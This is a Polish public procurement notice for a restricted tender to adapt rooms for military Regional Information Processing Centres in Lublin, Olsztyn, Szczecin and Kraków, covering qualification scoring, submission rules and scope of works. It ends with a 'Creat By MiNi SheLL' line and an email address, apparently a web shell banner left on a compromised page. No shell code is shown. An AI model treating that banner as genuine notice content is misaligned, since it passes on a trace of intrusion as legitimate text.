<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Jeżeli liczba Wykonawców, którzy spełniają  warunki  udziału w postępowaniu, okażą się być większa niż określona 
w ogłoszeniu,  Zmawiający zaprosi do udziału w postępowaniu Wykonawców, którzy otrzymali najwyższą ocenę spełnienia  poniższego  warunku:
      WARUNEK:  
Wykonali (samodzielnie lub w konsorcjum) w okresie ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie roboty budowlane  związane z przedmiotem zamówienia, przy czym za  takie roboty budowlane Zamawiający uzna  roboty budowlane w przypadku składania wniosku   dla każdej z części o numerach:
1)  01, 02, 03 - roboty budowlane obejmujące należyte wykonanie, co najmniej trzech  zamówień polegających na 
     budowie lub przebudowie obiektu budowlanego  za kwotę co najmniej 500,0 tys. zł netto w tym instalacje 
     teletechniczne za kwotę co najmniej 300,0 tys. zł netto każda, zł wraz z załączonymi dokumentami 
     potwierdzającymi,  że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
     ukończone.
2) 04 - roboty budowlane obejmujące należyte wykonanie, co najmniej trzech  zamówień polegających na 
     budowie lub przebudowie obiektu budowlanego  za kwotę co najmniej 1 000,0 tys. zł netto w tym instalacje 
     teletechniczne za kwotę co najmniej 500,0 tys. zł netto każda, zł wraz z załączonymi dokumentami 
     potwierdzającymi,  że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo 
     ukończone.  
Wykonawca, który wykaże największą ilość wykonanych robót budowlanych (powyżej warunku koniecznego)- otrzyma 100 punktów. Pozostali  proporcjonalnie mniej , według formuły:Wp=Wp of.bad :Wpmax  X 100
     
   Gdzie:
                 Wp  -  ilość punktów przyznana za ocenę spełnienia warunku;
   Wp of.bad   - ilość kwalifikowanych  (zdefiniowanych dodatkowych) robót budowlanych wykazanych we wniosku 
                    badanym;
       Wpmax       -  maksymalna wykazana ilość kwalifikowanych  robót budowlanych spośród wszystkich wniosków;
      100              - wskaźnik stały;</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy do treści oferty na podstawie  której   dokonano wyboru Wykonawcy i określił warunki tej zmiany w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Na stronie:www.rczsiut.wp.mil.pl  znajduje się  wniosek w sprawie zakwalifikowania do udziału w post<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ  zostanie przekazana Wykonawcom wraz z zaproszeniem do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2012 godzina 11:00, miejsce: RCZSiUT,  Warszawa, ul. Żwirki i Wigury 9/13, blok 30, pokój nr 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pisemny wniosek o dopuszczenie do udziału w postępowaniu wraz z załączonym  Oświadczeniem o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 50 w związku z art. 47 ustawy Prawo zamówień publicznych  oraz wszystkimi wymaganymi oświadczeniami i dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu oraz warunków dotyczących nie podlegania wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych, należy złożyć w miejscu wskazanym w sekcji  IV.4.4)  
w opakowaniu uniemożliwiającym zapoznanie się z jego treścią przed upływem terminu składania wniosków. Opakowanie powinno być opatrzone pieczątką lub adnotacją zawierającą nazwę i adres siedziby Wykonawcy oraz posiadać następujący napis  Wniosek w sprawie zakwalifikowania do udziału w postępowaniu przetargowym  na adaptacja pomieszczeń na potrzeby Regionalnych Ośrodków Przetwarzania Informacji- sprawa Nr 20/1/29/12.
2.	     Wzory  Oświadczeń  i inne dokumenty stanowiące załączniki do wniosku w sprawie zakwalifikowania do udziału 
w postępowaniu przetargowym znajdują się na stronie internetowej zamawiającego. 
3.	    Wniosek i dokumenty należy złożyć w języku polskim. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.
4.	     Dokumenty są składane  w  oryginale lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę.
5.	     Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania także oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Podpisany przez wszystkich wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik. 
6.	     Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. 
7.	    Wykonawca na etapie składania wniosków może przewidzieć, że powierzy wykonanie zamówienia podwykonawcom z wyjątkiem takich robót jak:
     1)   budowa instalacji elektrycznych;
                         2)   budowa instalacji teletechnicznych.  
8.	    Zamawiający na etapie składania ofert  zażąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
9.	    Podwykonawca realizujący część przedmiotu zamówienia musi posiadać dokument o którym mowa w pkt. III. 6.3
i dysponować  osobami, które oprócz kwalifikacji zawodowych będą  posiadały poświadczenia bezpieczeństwa  upoważniające do dostępu do informacji niejawnych w strefach ochronnych I, II lub III w zależności do wykonywanych czynności w tych strefach.   
10.	Pożądane jest, aby wszystkie strony wniosku były kolejno ponumerowane. Zaleca się, aby wniosek złączać 
w sposób uniemożliwiający wysunięcie którejkolwiek kartki. Numeracja stron powinna rozpocząć się od numeru 
1 umieszczonego na pierwszej stronie wniosku.
1.	Zamawiający będzie porozumiewał się z Wykonawcami pisemnie oraz za pomocą faksu (dopuszcza możliwość przesłania zaproszeń Wykonawcom do składania ofert również drogą elektroniczną)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji  w m. Lublin,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa infrastruktury związanej z adaptacją pomieszczeń na potrzeby 
Regionalnego Ośrodka Przetwarzania Informacji (ROPI) w kompleksie wojskowym   w Lublinie ul. Radziszewskiego 4, zgodnie z:
1.	Projektem budowlanym,
2.	Projektem wykonawczym Przebudowie pomieszczeń w Regionalnym Węźle Łączności w Lublinie na potrzeby Regionalnego Ośrodka Przetwarzania Informacji 
3.	Ekspertyzą techniczną dotyczącą możliwości modernizacji pomieszczenia węzła łączności 
z przeznaczeniem na ROPI w Lublinie ul. Radziszewskiego 4 oraz   przedmiarami robót i specyfikacjami technicznymi wykonania i odbioru robót. 
Zamierzenie  obejmuje:
1)	  Adaptację (ogólnobudowlaną) pomieszczeń w zakresie przystosowania do ROPI;
2)	  Budowę instalacji elektrycznych;
3)	  Budowę instalacji systemu klimatyzacji;
4)	  Budowę instalacji stałego urządzenia gaśniczego, systemu wczesnej detekcji dymu, wykrywania   
  pożaru, sterowania gaszeniem i sygnalizacji;
5)	  Budowę instalacji teletechnicznych; 
6)	  Budowę instalacji systemu SWiN, KD, monitoringu temperatury i wilgotności.
7)	  Wykonanie:
a.	dokumentacji powykonawczej w 4 egz.
b.	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.20-0, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji  w m. Olsztyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa infrastruktury związanej z adaptacją pomieszczeń na potrzeby Regionalnego 
            Ośrodka Przetwarzania Informacji (ROPI) w kompleksie wojskowym K-0263 w Olsztynie ul. Jagiellońska 53, zgodnie z:
1.	Projektem budowlanym,
2.	Projektem wykonawczym Przebudowa pomieszczeń w Regionalnym Węźle Łączności w Olsztynie na 
   potrzeby Regionalnego Ośrodka Przetwarzania Informacji,  
3.	Ekspertyzą techniczną dotyczącą możliwości modernizacji pomieszczenia węzła łączności z przeznaczeniem 
   na ROPI w Olsztynie ul. Jagiellońska 53 oraz  przedmiarami robót i specyfikacjami technicznymi wykonania 
   i odbioru robót. 
Zamierzenie  obejmuje:
1)	   Adaptację (ogólnobudowlaną) pomieszczeń w zakresie przystosowania do ROPI;
2)	   Budowę instalacji elektrycznych;
3)	   Budowę instalacji systemu klimatyzacji;
4)	   Budowę instalacji stałego urządzenia gaśniczego, systemu wczesnej detekcji dymu, wykrywania pożaru, 
    sterowania gaszeniem i sygnalizacji;
5)	    Budowę instalacji teletechnicznych; 
6)	    Budowę instalacji systemu SWiN, KD, monitoringu temperatury i wilgotności; 
7)	      Wykonanie:
a.	dokumentacji powykonawczej w 4 egz.
b.	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.20-0, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji  w m. Szczecin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa infrastruktury związanej z adaptacją pomieszczeń na potrzeby 
     Regionalnego Ośrodka Przetwarzania Informacji (ROPI) w kompleksie wojskowym  w Szczecinie, zgodnie z:
1.	Projektem budowlanym,
2.	Projektem wykonawczym Przebudowa pomieszczeń w Regionalnym Węźle Łączności w Szczecinie na potrzeby Regionalnego Ośrodka Przetwarzania Informacji,  
3.	Ekspertyzą techniczną dotyczącą możliwości modernizacji pomieszczenia węzła łączności 
z przeznaczeniem na ROPI w Szczecinie ul. Zalewskiego 2A oraz   przedmiarami robót i specyfikacjami technicznymi wykonania i odbioru robót. 
Zamierzenie  obejmuje:
1)	   Adaptację (ogólnobudowlaną) pomieszczeń w zakresie przystosowania do ROPI;
2)	   Budowę instalacji elektrycznych;
3)	   Budowę instalacji systemu klimatyzacji;
4)	   Budowę instalacji stałego urządzenia gaśniczego, systemu wczesnej detekcji dymu, wykrywania pożaru, 
   sterowania gaszeniem i sygnalizacji;
5)	   Budowę instalacji teletechnicznych; 
6)	   Budowę instalacji systemu SWiN, KD, monitoringu temperatury i wilgotności; 
7)	   Wykonanie:
a.	dokumentacji powykonawczej w 4 egz.
b.	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.20-0, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> Adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania Informacji  w m. Kraków - 
                         zadanie 1 
                         Adaptacja  pomieszczeń na potrzeby Zespołu Informatyki 2KZ w m.  Kraków - zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest adaptacja pomieszczeń na potrzeby Regionalnego Ośrodka Przetwarzania 
Informacji w kompleksie wojskowym  w budynku nr 22  Kraków -  Zadanie 1  oraz adaptacja  pomieszczeń na potrzeby Zespołu Informatyki 2KZ w budynku nr 22  Kraków - Zadanie 2, zgodnie z:
Zadanie 1:
1.	Projektem budowlanym,
2.	Opisem zamierzenia inwestycyjnego Budowa kanalizacji teletechnicznej na terenie kompleksu   w Krakwie,
3.	Projektem wykonawczym  Przebudowa pomieszczenia technicznego Nr 121 w budynku Nr 22 przy ul. Rakowickiej 29 
w Krakowie,
4.	 Projektem wykonawczym Budowa kanalizacji teletechnicznej i kabli światłowodowych oraz   przedmiarami robót 
i specyfikacjami technicznymi wykonania i odbioru robót. 

Zadanie 2:
1.	Projektem budowlanym,  
2.	Projektem wykonawczym Przebudowa pomieszczeń na potrzeby Zespołu Informatyki 2KZ, Kraków przy 
ul. Rakowickiej 29,  budynek Nr 22  oraz z  przedmiarami robót i specyfikacjami technicznymi wykonania i odbioru robót. 

Zamierzenie  obejmuje:
Zadanie 1:
1)	  Budowę i rozbudowę kanalizacji teletechnicznej wraz z budową kabli teletechnicznych.
2)	  Adaptację (ogólnobudowlaną) pomieszczenia w zakresie przystosowania do ROPI;
3)	  Budowę instalacji elektrycznych;
4)	  Budowę instalacji klimatyzacji;
5)	  Budowę instalacji stałego urządzenia gaśniczego, systemu wczesnej detekcji dymu, wykrywania pożaru, 
  sterowania gaszeniem i sygnalizacji;
6)	  Budowę instalacji teletechnicznych; 
7)	  Budowę instalacji systemu SWiN, KD, monitoringu temperatury i wilgotności; 
8)	   Wykonanie:
a.	geodezyjnej inwentaryzacji powykonawczej w 2 egz.
b.	dokumentacji powykonawczej w 4 egz.
c.	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym.

Zadanie 2:
1)	Adaptację (ogólnobudowlaną) pomieszczeń w zakresie przystosowania do ROPI;
2)	Budowę instalacji elektrycznych;
3)	Budowę instalacji systemu precyzyjnej klimatyzacji;
4)	Budowę instalacji stałego urządzenia gaśniczego, systemu wczesnej detekcji dymu, wykrywania pożaru, 
              sterowania gaszeniem i sygnalizacji;
5)	Budowę instalacji teletechnicznych; 
6)	Budowę instalacji systemu SWiN, KD, monitoringu temperatury i wilgotności; 
7)	Wykonanie
c.	dokumentacji powykonawczej w 4 egz.
d.	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.43.20-0, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com